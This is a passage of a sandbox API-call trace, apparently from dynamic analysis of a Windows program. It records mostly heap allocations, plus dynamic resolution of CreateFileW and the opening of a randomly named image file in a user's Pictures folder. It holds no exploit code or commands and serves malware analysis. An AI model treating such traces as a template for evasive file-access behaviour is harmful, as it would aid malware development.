Flags=0x0, Size=0x20) returned 0x43cf900 [0090.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0090.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0090.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0090.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0090.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0090.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0090.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0090.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0090.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0090.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0090.820] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0090.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0090.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0090.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0090.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0090.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0090.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0090.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0090.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0090.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0090.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0090.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ef0 [0090.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0090.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0090.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0090.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0090.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0090.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0090.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0090.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0090.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0090.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0090.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0090.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0090.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0090.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0090.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0090.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0090.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0090.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0090.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0090.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0090.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0090.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0090.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0090.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0090.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0090.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0090.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0090.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0090.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0090.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0090.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0090.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0090.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0090.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0090.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0090.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0090.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0090.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0090.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0090.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0090.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0090.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0090.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0090.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0090.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0090.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0090.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0090.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0090.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0090.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0090.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0090.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0090.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0090.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0090.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0090.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0090.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0090.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0090.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0090.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0090.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0090.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0090.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0090.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0090.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0090.824] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0090.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0090.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0090.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0090.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0090.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0090.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0090.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0090.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0090.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0090.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0090.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0090.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0090.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0090.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0090.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0090.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0090.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0090.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0090.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0090.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0090.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0090.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0090.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0090.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0090.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0090.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0090.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0090.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0090.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0090.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0090.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0090.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0090.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0090.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0090.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0090.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0090.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0090.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0090.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0090.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0090.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0090.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0090.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0090.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0090.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0090.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0090.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0090.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0090.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0090.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0090.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0090.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0090.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0090.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0090.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0090.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0090.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0090.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0090.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0090.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0090.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0090.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0090.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0090.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0090.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0090.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0090.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0090.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0090.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0090.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0090.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0090.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0090.827] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0090.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0090.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0090.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca220 [0090.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca220, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0090.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0090.828] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0090.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0090.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0090.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0090.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0090.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0090.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0090.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0090.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0090.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0090.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0090.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0090.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0090.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0090.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0090.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0090.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0090.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0090.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0090.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0090.830] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\XwG8Sj1nv9U.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\xwg8sj1nv9u.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0090.830] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0090.830] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea0b8 [0090.830] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0090.830] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0090.830] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0090.830] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0090.830] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0090.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0090.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0090.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0090.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0090.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0090.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0090.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0090.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0090.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43597f8 [0090.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0090.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0090.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0090.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0090.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0090.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0090.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0090.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0090.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0090.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0090.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0090.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0090.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0090.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0090.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0090.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0090.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0090.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0090.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0090.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0090.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0090.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0090.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0090.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0090.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0090.832] FreeLibrary (hLibModule=0x772d0000) returned 1 [0090.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0090.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0090.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0090.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0090.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0090.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0090.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0090.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0090.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0090.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0090.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ef0 | out: hHeap=0x1780000) returned 1 [0090.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0090.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0090.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: 